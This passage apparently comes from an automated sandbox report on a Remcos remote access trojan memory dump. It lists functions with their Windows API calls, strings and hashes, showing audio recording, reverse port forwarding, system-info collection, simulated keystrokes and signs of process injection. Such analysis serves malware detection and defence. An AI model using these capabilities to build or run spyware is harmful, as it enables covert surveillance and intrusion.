                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 004481B5
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 004481C1
                                                                • _free.LIBCMT ref: 004481CC
                                                                • _free.LIBCMT ref: 004481D7
                                                                • _free.LIBCMT ref: 004481E2
                                                                • _free.LIBCMT ref: 004481ED
                                                                • _free.LIBCMT ref: 004481F8
                                                                • _free.LIBCMT ref: 00448203
                                                                • _free.LIBCMT ref: 0044820E
                                                                • _free.LIBCMT ref: 0044821C
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Eventinet_ntoa
                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                • API String ID: 3578746661-3604713145
                                                                • Opcode ID: e77db000166ebc480288ee2e00742aa421b72345e853156657c44ddda8400bf2
                                                                • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                • Opcode Fuzzy Hash: e77db000166ebc480288ee2e00742aa421b72345e853156657c44ddda8400bf2
                                                                • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DecodePointer
                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                • API String ID: 3527080286-3064271455
                                                                • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                • API String ID: 1462127192-2001430897
                                                                • Opcode ID: 3dcdec93a5b2ef47c9a36cc54a74972cde4cc8c62f598a85648e0a90931188fa
                                                                • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                • Opcode Fuzzy Hash: 3dcdec93a5b2ef47c9a36cc54a74972cde4cc8c62f598a85648e0a90931188fa
                                                                • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CurrentProcess
                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                • API String ID: 2050909247-4242073005
                                                                • Opcode ID: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
                                                                • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                • Opcode Fuzzy Hash: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
                                                                • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _strftime.LIBCMT ref: 00401D50
                                                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                • API String ID: 3809562944-243156785
                                                                • Opcode ID: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                                • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                • Opcode Fuzzy Hash: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                                • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                • int.LIBCPMT ref: 00410EBC
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                • String ID: ,kG$0kG
                                                                • API String ID: 3815856325-2015055088
                                                                • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                • waveInStart.WINMM ref: 00401CFE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                • String ID: dMG$|MG$PG
                                                                • API String ID: 1356121797-532278878
                                                                • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                  • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                  • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                  • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                • TranslateMessage.USER32(?), ref: 0041D57A
                                                                • DispatchMessageA.USER32(?), ref: 0041D584
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                • String ID: Remcos
                                                                • API String ID: 1970332568-165870891
                                                                • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2617abffa626f75de14076698c196880abdc2722d48b4afa90194addc5c06332
                                                                • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                • Opcode Fuzzy Hash: 2617abffa626f75de14076698c196880abdc2722d48b4afa90194addc5c06332
                                                                • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                • __alloca_probe_16.LIBCMT ref: 00454014
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                • __freea.LIBCMT ref: 00454083
                                                                • __freea.LIBCMT ref: 0045408F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                • String ID:
                                                                • API String ID: 201697637-0
                                                                • Opcode ID: aca7b2e34d6fca180bf378bc8fe33df5bb5a65d5f6b622e42f01d4b2dcd141bd
                                                                • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                • Opcode Fuzzy Hash: aca7b2e34d6fca180bf378bc8fe33df5bb5a65d5f6b622e42f01d4b2dcd141bd
                                                                • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                • _free.LIBCMT ref: 00445515
                                                                • _free.LIBCMT ref: 0044552E
                                                                • _free.LIBCMT ref: 00445560
                                                                • _free.LIBCMT ref: 00445569
                                                                • _free.LIBCMT ref: 00445575
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                • String ID: C
                                                                • API String ID: 1679612858-1037565863
                                                                • Opcode ID: 05701d8adb5406d1562c14b31316c91fe53ace2ea37426e70e906b20dbb38a64
                                                                • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                • Opcode Fuzzy Hash: 05701d8adb5406d1562c14b31316c91fe53ace2ea37426e70e906b20dbb38a64
                                                                • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: tcp$udp
                                                                • API String ID: 0-3725065008
                                                                • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                • ExitThread.KERNEL32 ref: 004018F6
                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                • String ID: PkG$XMG$NG$NG
                                                                • API String ID: 1649129571-3151166067
                                                                • Opcode ID: a429b817407b60a57ca8399c4041a7761809850493783fc7a0b3f41dc707f752
                                                                • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                • Opcode Fuzzy Hash: a429b817407b60a57ca8399c4041a7761809850493783fc7a0b3f41dc707f752
                                                                • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                • String ID: .part
                                                                • API String ID: 1303771098-3499674018
                                                                • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                Function 0044ACC9 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                • __freea.LIBCMT ref: 0044AEB0
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • __freea.LIBCMT ref: 0044AEB9
                                                                • __freea.LIBCMT ref: 0044AEDE
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                • String ID:
                                                                • API String ID: 3864826663-0
                                                                • Opcode ID: fdde0a3fba0e2e79fb92f6962f835a9100c7e8c667bc286140aaf21858552f70
                                                                • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                • Opcode Fuzzy Hash: fdde0a3fba0e2e79fb92f6962f835a9100c7e8c667bc286140aaf21858552f70
                                                                • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                                Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendInput.USER32 ref: 00419A25
                                                                • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                  • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InputSend$Virtual
                                                                • String ID:
                                                                • API String ID: 1167301434-0
                                                                • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __freea$__alloca_probe_16_free
                                                                • String ID: a/p$am/pm$h{D
                                                                • API String ID: 2936374016-2303565833
                                                                • Opcode ID: f278f6ccdddd9c8957b45727c0f983370dbb743190d53240140d279861cd7d37
                                                                • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                • Opcode Fuzzy Hash: f278f6ccdddd9c8957b45727c0f983370dbb743190d53240140d279861cd7d37
                                                                • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
